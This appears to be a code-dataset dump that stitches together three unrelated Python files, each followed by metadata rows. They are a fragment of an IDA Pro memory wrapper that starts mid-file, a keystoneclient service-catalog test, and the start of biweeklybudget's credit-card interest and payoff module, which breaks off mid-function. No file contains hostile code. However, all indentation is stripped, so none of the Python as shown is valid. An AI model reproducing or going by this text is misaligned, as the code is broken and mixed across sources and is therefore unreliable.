keys = [-1] + sorted(exclude) + [self.ida.idc.MAXADDR + 1]
ranges = []
for i in range(len(keys) - 1):
a, b = keys[i], keys[i+1]
if b - a > 1:  # only gaps that actually contain addresses
ranges.append((a+1, b-1))
heads = {}
for start, end in ranges:
for head in self.ida.idautils.Heads(start, end, 1):
heads[head] = self.ida.idc.ItemSize(head)
return heads
@_ondemand
def segments(self):
# TODO: Documentation
LOG.debug("Getting segments from IDA for file %s", self.ida.filename)
segments_size = {}
for s in self.ida.idautils.Segments():
segments_size[s] = self.ida.idc.SegEnd(s) - self.ida.idc.SegStart(s)
return segments_size
@_ondemand
def idakeys(self):
# TODO: Documentation
keys = set()
for h, s in self.segments().iteritems():
for i in range(s):
keys.add(h + i)
for h, s in self.heads(exclude=keys).iteritems():
for i in range(s):
keys.add(h + i)
LOG.debug("Done getting keys.")
return keys
def __iter__(self):
# TODO: Refactor to be more pythonic
for key in self.idakeys():
yield key
def __len__(self):
# This is significantly faster than list(self.__iter__) because
# we do not need to keep the whole list in memory, just the accumulator.
return sum(1 for _ in self)
def __contains__(self, key):
return key in self.keys()
def reset(self):
# TODO: Documentation
if hasattr(self, "_heads"):
delattr(self, "_heads")
if hasattr(self, "_segments"):
delattr(self, "_segments")
if hasattr(self, "_idakeys"):
delattr(self, "_idakeys")
class IDAPermissions(IDAKeys):
def __init__(self, ida, default_perm=7):
super(IDAPermissions, self).__init__(ida)
self.default_perm = default_perm
def __getitem__(self, address):
# Only do things that we actually have in IDA
if address not in self:
raise KeyError(address)
seg_start = self.ida.idc.SegStart(address)
if seg_start == self.ida.idc.BADADDR:
# We can really only return the default here
return self.default_perm
return self.ida.idc.GetSegmentAttr(seg_start, self.ida.idc.SEGATTR_PERM)
def __setitem__(self, address, value):
# Nothing we can do here
pass
def __delitem__(self, address):
# Nothing we can do here
pass
class CachedIDAPermissions(IDAPermissions):
def __init__(self, ida, default_perm=7):
super(CachedIDAPermissions, self).__init__(ida)
self.permissions = {}
self.default_perm = default_perm
def __getitem__(self, address):
if address in self.permissions:
return self.permissions[address]
p = super(CachedIDAPermissions, self).__getitem__(address)
# cache the segment
seg_start = self.ida.idc.SegStart(address)
seg_end = self.ida.idc.SegEnd(address)
if seg_start == self.ida.idc.BADADDR:
self.permissions[address] = p
else:
for i in range(seg_start, seg_end):
self.permissions[i] = p
return p
def __setitem__(self, address, value):
self.permissions[address] = value
def __delitem__(self, address):
self.permissions.pop(address, None)
def reset(self):
# TODO: Documentation
self.permissions.clear()
super(CachedIDAPermissions, self).reset()
class IDAMemory(IDAKeys):
def __init__(self, ida, default_byte=chr(0xff)):
super(IDAMemory, self).__init__(ida)
self.default_byte = default_byte
def __getitem__(self, address):
# only do things that we actually have in IDA
if address not in self:
raise KeyError(address)
value = self.ida.idaapi.get_many_bytes(address, 1)
if value is None:
value = self.default_byte
return value
def __setitem__(self, address, value):
self.ida.idaapi.patch_byte(address, value)
def __delitem__(self, address):
# nothing we can really do here
pass
class CachedIDAMemory(IDAMemory):
def __init__(self, ida, default_byte=chr(0xff)):
super(CachedIDAMemory, self).__init__(ida, default_byte)
self.local = {}
self._pulled = False
@property
def pulled(self):
"""Check if memory has been pulled from the remote link.
"""
return self._pulled
def __getitem__(self, address):
if address in self.local:
return self.local[address]
LOG.debug("Uncached byte: 0x%x", address)
one = super(CachedIDAMemory, self).__getitem__(address)
# cache the byte if it's not in a segment
seg_start = self.ida.idc.SegStart(address)
if seg_start == self.ida.idc.BADADDR:
self.local[address] = one
else:
# otherwise, cache the segment
seg_end = self.ida.idc.SegEnd(address)
seg_size = seg_end - seg_start
self._load_memory(seg_start, seg_size)
return one
def __iter__(self):
if self.pulled:
return self.local.__iter__()
else:
return super(CachedIDAMemory, self).__iter__()
def __setitem__(self, address, value):
self.local[address] = value
def __delitem__(self, address):
self.local.pop(address, None)
def get_memory(self, start, size):
"""Retrieve an area of memory from IDA.
Returns a sparse dictionary of address -> value.
"""
LOG.debug("get_memory: %d bytes from %x", size, start)
return get_memory(self.ida.idaapi, start, size,
default_byte=self.default_byte)
def pull_defined(self):
if self.pulled:
return
start = self.ida.idc.MinEA()
size = self.ida.idc.MaxEA() - start
LOG.debug("Loading memory of %s (%d bytes)...", self.ida.filename, size)
chunks = self.ida.remote_idalink_module.get_memory(None, start, size)
LOG.debug("Storing loaded memory of %s...", self.ida.filename)
self._store_loaded_chunks(chunks)
self._pulled = True
def reset(self):
self.local.clear()
self._pulled = False
super(CachedIDAMemory, self).reset()
# Helpers
def _load_memory(self, start, size):
chunks = self.get_memory(start, size)
self._store_loaded_chunks(chunks)
def _store_loaded_chunks(self, chunks):
LOG.debug("Updating cache with %d chunks", len(chunks))
for start, buff in chunks.iteritems():
for n, i in enumerate(buff):
if start + n not in self.local:
self.local[start + n] = i
|
gpl-3.0
| -4,595,868,428,126,769,700
| 30.791667
| 80
| 0.586407
| false
| 3.812277
| false
| false
| false
|
sdpp/python-keystoneclient
|
keystoneclient/tests/unit/v2_0/test_service_catalog.py
|
1
|
9165
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient import exceptions
from keystoneclient import fixture
from keystoneclient.tests.unit.v2_0 import client_fixtures
from keystoneclient.tests.unit.v2_0 import utils
class ServiceCatalogTest(utils.TestCase):
def setUp(self):
super(ServiceCatalogTest, self).setUp()
self.AUTH_RESPONSE_BODY = client_fixtures.auth_response_body()
def test_building_a_service_catalog(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
self.assertEqual(sc.url_for(service_type='compute'),
"https://compute.north.host/v1/1234")
self.assertEqual(sc.url_for('tenantId', '1', service_type='compute'),
"https://compute.north.host/v1/1234")
self.assertEqual(sc.url_for('tenantId', '2', service_type='compute'),
"https://compute.north.host/v1.1/3456")
self.assertRaises(exceptions.EndpointNotFound, sc.url_for, "region",
"South", service_type='compute')
def test_service_catalog_endpoints(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
public_ep = sc.get_endpoints(service_type='compute',
endpoint_type='publicURL')
self.assertEqual(public_ep['compute'][1]['tenantId'], '2')
self.assertEqual(public_ep['compute'][1]['versionId'], '1.1')
self.assertEqual(public_ep['compute'][1]['internalURL'],
"https://compute.north.host/v1.1/3456")
def test_service_catalog_regions(self):
self.AUTH_RESPONSE_BODY['access']['region_name'] = "North"
# Setting region_name on the catalog is deprecated.
with self.deprecations.expect_deprecations_here():
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', endpoint_type='publicURL')
self.assertEqual(url, "https://image.north.host/v1/")
self.AUTH_RESPONSE_BODY['access']['region_name'] = "South"
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', endpoint_type='internalURL')
self.assertEqual(url, "https://image-internal.south.host/v1/")
def test_service_catalog_empty(self):
self.AUTH_RESPONSE_BODY['access']['serviceCatalog'] = []
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
self.assertRaises(exceptions.EmptyCatalog,
auth_ref.service_catalog.url_for,
service_type='image',
endpoint_type='internalURL')
def test_service_catalog_get_endpoints_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
endpoints = sc.get_endpoints(service_type='image', region_name='North')
self.assertEqual(len(endpoints), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.north.host/v1/')
endpoints = sc.get_endpoints(service_type='image', region_name='South')
self.assertEqual(len(endpoints), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.south.host/v1/')
endpoints = sc.get_endpoints(service_type='compute')
self.assertEqual(len(endpoints['compute']), 2)
endpoints = sc.get_endpoints(service_type='compute',
region_name='North')
self.assertEqual(len(endpoints['compute']), 2)
endpoints = sc.get_endpoints(service_type='compute',
region_name='West')
self.assertEqual(len(endpoints['compute']), 0)
def test_service_catalog_url_for_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', region_name='North')
self.assertEqual(url, 'https://image.north.host/v1/')
url = sc.url_for(service_type='image', region_name='South')
self.assertEqual(url, 'https://image.south.host/v1/')
url = sc.url_for(service_type='compute',
region_name='North',
attr='versionId',
filter_value='1.1')
self.assertEqual(url, 'https://compute.north.host/v1.1/3456')
self.assertRaises(exceptions.EndpointNotFound, sc.url_for,
service_type='image', region_name='West')
def test_service_catalog_get_url_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
urls = sc.get_urls(service_type='image')
self.assertEqual(len(urls), 2)
urls = sc.get_urls(service_type='image', region_name='North')
self.assertEqual(len(urls), 1)
self.assertEqual(urls[0], 'https://image.north.host/v1/')
urls = sc.get_urls(service_type='image', region_name='South')
self.assertEqual(len(urls), 1)
self.assertEqual(urls[0], 'https://image.south.host/v1/')
urls = sc.get_urls(service_type='image', region_name='West')
self.assertIsNone(urls)
def test_service_catalog_param_overrides_body_region(self):
self.AUTH_RESPONSE_BODY['access']['region_name'] = "North"
# Setting region_name on the catalog is deprecated.
with self.deprecations.expect_deprecations_here():
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image')
self.assertEqual(url, 'https://image.north.host/v1/')
url = sc.url_for(service_type='image', region_name='South')
self.assertEqual(url, 'https://image.south.host/v1/')
endpoints = sc.get_endpoints(service_type='image')
self.assertEqual(len(endpoints['image']), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.north.host/v1/')
endpoints = sc.get_endpoints(service_type='image', region_name='South')
self.assertEqual(len(endpoints['image']), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.south.host/v1/')
def test_service_catalog_service_name(self):
auth_ref = access.AccessInfo.factory(resp=None,
body=self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_name='Image Servers', endpoint_type='public',
service_type='image', region_name='North')
self.assertEqual('https://image.north.host/v1/', url)
self.assertRaises(exceptions.EndpointNotFound, sc.url_for,
service_name='Image Servers', service_type='compute')
urls = sc.get_urls(service_type='image', service_name='Image Servers',
endpoint_type='public')
self.assertIn('https://image.north.host/v1/', urls)
self.assertIn('https://image.south.host/v1/', urls)
urls = sc.get_urls(service_type='image', service_name='Servers',
endpoint_type='public')
self.assertIsNone(urls)
def test_service_catalog_multiple_service_types(self):
token = fixture.V2Token()
token.set_scope()
for i in range(3):
s = token.add_service('compute')
s.add_endpoint(public='public-%d' % i,
admin='admin-%d' % i,
internal='internal-%d' % i,
region='region-%d' % i)
auth_ref = access.AccessInfo.factory(resp=None, body=token)
urls = auth_ref.service_catalog.get_urls(service_type='compute',
endpoint_type='publicURL')
self.assertEqual(set(['public-0', 'public-1', 'public-2']), set(urls))
urls = auth_ref.service_catalog.get_urls(service_type='compute',
endpoint_type='publicURL',
region_name='region-1')
self.assertEqual(('public-1', ), urls)
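# Example (hypothetical sketch, mirroring the fixture pattern used above):
# building a minimal V2 token and resolving an endpoint from its catalog.
def _example_url_lookup():
    token = fixture.V2Token()
    token.set_scope()
    svc = token.add_service('identity')
    svc.add_endpoint(public='http://public.example.com',
                     admin='http://admin.example.com',
                     internal='http://internal.example.com',
                     region='RegionOne')
    auth_ref = access.AccessInfo.factory(resp=None, body=token)
    # Defaults to the public endpoint of the requested service type.
    return auth_ref.service_catalog.url_for(service_type='identity')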
|
apache-2.0
| -4,503,097,674,112,767,500
| 43.926471
| 79
| 0.602728
| false
| 3.950431
| true
| false
| false
|
jantman/biweeklybudget
|
biweeklybudget/interest.py
|
1
|
37651
|
"""
The latest version of this package is available at:
<http://github.com/jantman/biweeklybudget>
################################################################################
Copyright 2016 Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
This file is part of biweeklybudget, also known as biweeklybudget.
biweeklybudget is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
biweeklybudget is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with biweeklybudget. If not, see <http://www.gnu.org/licenses/>.
The Copyright and Authors attributions contained herein may not be removed or
otherwise altered, except to add the Author attribution of a contributor to
this work. (Additional Terms pursuant to Section 7b of the AGPL v3)
################################################################################
While not legally required, I sincerely request that anyone who finds
bugs please submit them at <https://github.com/jantman/biweeklybudget> or
to me via email, and that you send any contributions or improvements
either as a pull request on GitHub, or to me via email.
################################################################################
AUTHORS:
Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
################################################################################
"""
import logging
from datetime import timedelta
from decimal import Decimal
from dateutil.relativedelta import relativedelta
from calendar import monthrange
from biweeklybudget.models.account import Account, AcctType
logger = logging.getLogger(__name__)
class InterestHelper(object):
def __init__(self, db_sess, increases={}, onetimes={}):
"""
Initialize interest calculation helper.
:param db_sess: Database Session
:type db_sess: sqlalchemy.orm.session.Session
:param increases: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for new max payment amount to take effect
on the specified date.
:type increases: dict
:param onetimes: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for additional amounts to add to the first
maximum payment on or after the given date
:type onetimes: dict
"""
self._sess = db_sess
self._accounts = self._get_credit_accounts()
self._statements = self._make_statements(self._accounts)
self._increases = increases
self._onetimes = onetimes
@property
def accounts(self):
"""
Return a dict of `account_id` to :py:class:`~.Account` for all Credit
type accounts with OFX data present.
:return: dict of account_id to Account instance
:rtype: dict
"""
return self._accounts
def _get_credit_accounts(self):
"""
Return a dict of `account_id` to :py:class:`~.Account` for all Credit
type accounts with OFX data present.
:return: dict of account_id to Account instance
:rtype: dict
"""
accts = self._sess.query(Account).filter(
Account.acct_type.__eq__(AcctType.Credit),
Account.is_active.__eq__(True)
).all()
res = {a.id: a for a in accts}
return res
def _make_statements(self, accounts):
"""
Make :py:class:`~.CCStatement` instances for each account; return a
dict of `account_id` to CCStatement instance.
:param accounts: dict of (int) account_id to Account instance
:type accounts: dict
:return: dict of (int) account_id to CCStatement instance
:rtype: dict
"""
res = {}
for a_id, acct in accounts.items():
icls = INTEREST_CALCULATION_NAMES[acct.interest_class_name]['cls'](
acct.effective_apr
)
bill_period = _BillingPeriod(acct.balance.ledger_date.date())
min_pay_cls = MIN_PAYMENT_FORMULA_NAMES[
acct.min_payment_class_name]['cls']()
res[a_id] = CCStatement(
icls,
abs(acct.balance.ledger),
min_pay_cls,
bill_period,
end_balance=abs(acct.balance.ledger),
interest_amt=acct.last_interest_charge
)
logger.debug('Statements: %s', res)
return res
@property
def min_payments(self):
"""
Return a dict of `account_id` to minimum payment for the latest
statement, for each account.
:return: dict of `account_id` to minimum payment (Decimal)
:rtype: dict
"""
res = {}
for a_id, stmt in self._statements.items():
res[a_id] = stmt.minimum_payment
logger.debug('Minimum payments by account_id: %s', res)
return res
def calculate_payoffs(self):
"""
Calculate payoffs for each account/statement.
:return: dict of payoff information. Keys are payoff method names.
Values are dicts, with keys "description" (str description of the
payoff method), "doc" (the docstring of the class), and "results".
The "results" dict has integer `account_id` as the key, and values are
dicts with keys "payoff_months" (int), "total_payments" (Decimal),
"total_interest" (Decimal) and ``next_payment`` (Decimal).
:rtype: dict
"""
res = {}
max_total = sum(list(self.min_payments.values()))
for name in sorted(PAYOFF_METHOD_NAMES.keys()):
cls = PAYOFF_METHOD_NAMES[name]['cls']
klass = cls(
max_total, increases=self._increases, onetimes=self._onetimes
)
if not cls.show_in_ui:
continue
res[name] = {
'description': PAYOFF_METHOD_NAMES[name]['description'],
'doc': PAYOFF_METHOD_NAMES[name]['doc']
}
try:
res[name]['results'] = self._calc_payoff_method(klass)
except Exception as ex:
res[name]['error'] = str(ex)
logger.error('Minimum payment method %s failed: %s',
name, ex)
return res
def _calc_payoff_method(self, cls):
"""
Calculate payoffs using one method.
:param cls: payoff method class
:type cls: biweeklybudget.interest._PayoffMethod
:return: Dict with integer `account_id` as the key, and values are
dicts with keys "payoff_months" (int), "total_payments" (Decimal),
"total_interest" (Decimal), "next_payment" (Decimal).
:rtype: dict
"""
balances = {
x: self._statements[x].principal for x in self._statements.keys()
}
res = {}
calc = calculate_payoffs(cls, list(self._statements.values()))
for idx, result in enumerate(calc):
a_id = list(self._statements.keys())[idx]
res[a_id] = {
'payoff_months': result[0],
'total_payments': result[1],
'total_interest': result[1] - balances[a_id],
'next_payment': result[2]
}
return res
class _InterestCalculation(object):
#: Human-readable string name of the interest calculation type.
description = None
def __init__(self, apr):
"""
:param apr: Annual Percentage Rate as a decimal
:type apr: decimal.Decimal
"""
self._apr = apr
def __repr__(self):
return '<%s(decimal.Decimal(\'%s\'))>' % (
self.__class__.__name__, self.apr
)
@property
def apr(self):
return self._apr
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
raise NotImplementedError("Must implement in subclass")
class AdbCompoundedDaily(_InterestCalculation):
"""
Average Daily Balance method, compounded daily (like American Express).
"""
#: Human-readable string name of the interest calculation type.
description = 'Average Daily Balance Compounded Daily (AmEx)'
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
dpr = self._apr / Decimal(365.0)
interest = Decimal(0.0)
num_days = 0
bal_total = Decimal(0.0)
bal = principal
d = first_d
while d <= last_d:
num_days += 1
if d in transactions:
bal += transactions[d]
int_amt = bal * dpr
interest += int_amt
bal += int_amt
bal_total += bal
d += timedelta(days=1)
adb = bal_total / Decimal(num_days)
final = adb * self._apr * num_days / Decimal(365.0)
bal += final * dpr
return {
'interest_paid': final,
'end_balance': bal
}
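# Example (hypothetical sketch, not part of biweeklybudget): one 30-day
# period on a $1000.00 balance at 19.99% APR, with no transactions.
def _example_adb_interest():
    from datetime import date
    calc = AdbCompoundedDaily(Decimal('0.1999'))
    # Returns a dict with 'interest_paid' and 'end_balance' Decimals.
    return calc.calculate(Decimal('1000.00'), date(2017, 1, 1), date(2017, 1, 30))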
class SimpleInterest(_InterestCalculation):
"""
Simple interest, charged on balance at the end of the billing period.
"""
#: Human-readable string name of the interest calculation type.
description = 'Interest charged once on the balance at end of period.'
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
num_days = 0
bal = principal
d = first_d
while d <= last_d:
num_days += 1
if d in transactions:
bal += transactions[d]
d += timedelta(days=1)
final = bal * self._apr * num_days / Decimal(365.0)
return {
'interest_paid': final,
'end_balance': bal + final
}
class _BillingPeriod(object):
#: human-readable string description of the billing period type
description = None
def __init__(self, end_date, start_date=None):
"""
Construct a billing period that is defined by a number of days.
:param end_date: end date of the billing period
:type end_date: datetime.date
:param start_date: start date for billing period; if specified, will
override calculation of start date
:type start_date: datetime.date
"""
self._period_for_date = end_date
if start_date is None:
if end_date.day < 15:
# if end date is < 15, period is month before end_date
self._end_date = (end_date.replace(day=1) - timedelta(days=1))
self._start_date = self._end_date.replace(day=1)
else:
# if end date >= 15, period is month containing end_date
self._start_date = end_date.replace(day=1)
self._end_date = end_date.replace(
day=(monthrange(
end_date.year, end_date.month
)[1])
)
else:
self._start_date = start_date
self._end_date = self._start_date.replace(
day=(monthrange(
self._start_date.year, self._start_date.month
)[1])
)
def __repr__(self):
return '<BillingPeriod(%s, start_date=%s)>' % (
self._end_date, self._start_date
)
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def payment_date(self):
period_length = (self._end_date - self._start_date).days
return self._start_date + timedelta(days=int(period_length / 2))
@property
def next_period(self):
"""
Return the next billing period after this one.
:return: next billing period
:rtype: _BillingPeriod
"""
return _BillingPeriod(
self._end_date + relativedelta(months=1),
start_date=(self._end_date + timedelta(days=1))
)
@property
def prev_period(self):
"""
Return the previous billing period before this one.
:return: previous billing period
:rtype: _BillingPeriod
"""
e = self._start_date - timedelta(days=1)
return _BillingPeriod(e, start_date=e.replace(day=1))
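# Example (hypothetical sketch): an end date on or after the 15th produces a
# billing period covering the whole month that contains it.
def _example_billing_period():
    from datetime import date
    period = _BillingPeriod(date(2017, 6, 20))
    # period.start_date == date(2017, 6, 1); period.end_date == date(2017, 6, 30)
    return period.payment_date  # mid-period date used when applying payments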
class _MinPaymentFormula(object):
#: human-readable string description of the formula
description = None
def __init__(self):
pass
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
raise NotImplementedError()
class MinPaymentAmEx(_MinPaymentFormula):
"""
Interest on last statement plus 1% of balance,
or $35 if balance is less than $35.
"""
#: human-readable string description of the formula
description = 'AmEx - Greatest of Interest Plus 1% of Principal, or $35'
def __init__(self):
super(MinPaymentAmEx, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
amt = interest + (balance * Decimal('.01'))
if amt < 35:
amt = 35
return amt
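# Example (hypothetical sketch): a $2000.00 balance with $30.00 of interest
# yields interest plus 1% of principal, i.e. $50.00, under the formula above.
def _example_amex_min_payment():
    return MinPaymentAmEx().calculate(Decimal('2000.00'), Decimal('30.00'))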
class MinPaymentDiscover(_MinPaymentFormula):
"""
Greater of:
- $35; or
- 2% of the New Balance shown on your billing statement; or
- $20, plus any of the following charges as shown on your billing statement:
fees for any debt protection product that you enrolled in on or after
2/1/2015; Interest Charges; and Late Fees.
"""
#: human-readable string description of the formula
description = 'Discover - Greatest of 2% of Principal, or $20 plus ' \
'Interest, or $35'
def __init__(self):
super(MinPaymentDiscover, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
options = [
Decimal(35),
balance * Decimal('0.02'),
Decimal(20) + interest
]
return max(options)
class MinPaymentCiti(_MinPaymentFormula):
"""
Greater of:
- $25;
- The new balance, if it's less than $25;
- 1 percent of the new balance, plus the current statement's interest
charges or minimum interest charges, plus late fees;
- 1.5% of the new balance, rounded to the nearest dollar amount.
In all cases, add past fees and finance charges due, plus any amount in
excess of credit line.
"""
#: human-readable string description of the formula
description = 'Citi - Greatest of 1.5% of Principal, or 1% of Principal ' \
'plus interest and fees, or $25, or Principal'
def __init__(self):
super(MinPaymentCiti, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
options = [
25,
(balance * Decimal('0.01')) + interest,
round(balance * Decimal('0.015'))
]
if balance < Decimal('25'):
options.append(balance)
return max(options)
class _PayoffMethod(object):
"""
A payoff method for multiple cards; a method of figuring out how much to
pay on each card, each month.
"""
#: human-readable string name of the payoff method
description = None
def __init__(self, max_total_payment=None, increases={}, onetimes={}):
"""
Initialize a payment method.
:param max_total_payment: maximum total payment for all statements
:type max_total_payment: decimal.Decimal
:param increases: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for new max payment amount to take effect
on the specified date.
:type increases: dict
:param onetimes: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for additional amounts to add to the first
maximum payment on or after the given date
:type onetimes: dict
"""
self._max_total = max_total_payment
self._increases = increases
self._onetimes = onetimes
def __repr__(self):
return '<%s(%s, increases=%s, onetimes=%s)>' % (
self.__class__.__name__, self._max_total, self._increases,
self._onetimes
)
def max_total_for_period(self, period):
"""
Given a :py:class:`~._BillingPeriod`, calculate the maximum total
payment for that period, including both `self._max_total` and the
increases and onetimes specified on the class constructor.
:param period: billing period to get maximum total payment for
:type period: _BillingPeriod
:return: maximum total payment for the period
:rtype: decimal.Decimal
"""
res = self._max_total
for inc_d in sorted(self._increases.keys(), reverse=True):
if inc_d > period.payment_date:
continue
inc_amt = self._increases[inc_d]
logger.debug('Found increase of %s starting on %s, applied to '
'period %s', inc_amt, inc_d, period)
res = inc_amt
break
for ot_d, ot_amt in self._onetimes.items():
if period.prev_period.payment_date < ot_d <= period.payment_date:
logger.debug('Found onetime of %s on %s in period %s',
ot_amt, ot_d, period)
res += ot_amt
logger.debug('Period %s _max_total=%s max_total_for_period=%s',
period, self._max_total, res)
return res
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
raise NotImplementedError()
class MinPaymentMethod(_PayoffMethod):
"""
Pay only the minimum on each statement.
"""
description = 'Minimum Payment Only'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
return [s.minimum_payment for s in statements]
class FixedPaymentMethod(_PayoffMethod):
"""
TESTING ONLY - pay the same amount on every statement.
"""
description = 'TESTING ONLY - Fixed Payment for All Statements'
show_in_ui = False
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
return [self._max_total for _ in statements]
class HighestBalanceFirstMethod(_PayoffMethod):
"""
Pay statements off from highest to lowest balance.
"""
description = 'Highest to Lowest Balance'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
max_bal = Decimal('0.00')
max_idx = None
for idx, stmt in enumerate(statements):
if stmt.principal > max_bal:
max_bal = stmt.principal
max_idx = idx
res = [None for _ in statements]
max_pay = max_total - (
min_sum - statements[max_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == max_idx:
res[idx] = max_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class HighestInterestRateFirstMethod(_PayoffMethod):
"""
Pay statements off from highest to lowest interest rate.
"""
description = 'Highest to Lowest Interest Rate'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
max_apr = Decimal('0.00')
max_idx = None
for idx, stmt in enumerate(statements):
if stmt.apr > max_apr:
max_apr = stmt.apr
max_idx = idx
res = [None for _ in statements]
max_pay = max_total - (
min_sum - statements[max_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == max_idx:
res[idx] = max_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class LowestBalanceFirstMethod(_PayoffMethod):
"""
Pay statements off from lowest to highest balance, a.k.a. the "snowball"
method.
"""
description = 'Lowest to Highest Balance (a.k.a. Snowball Method)'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
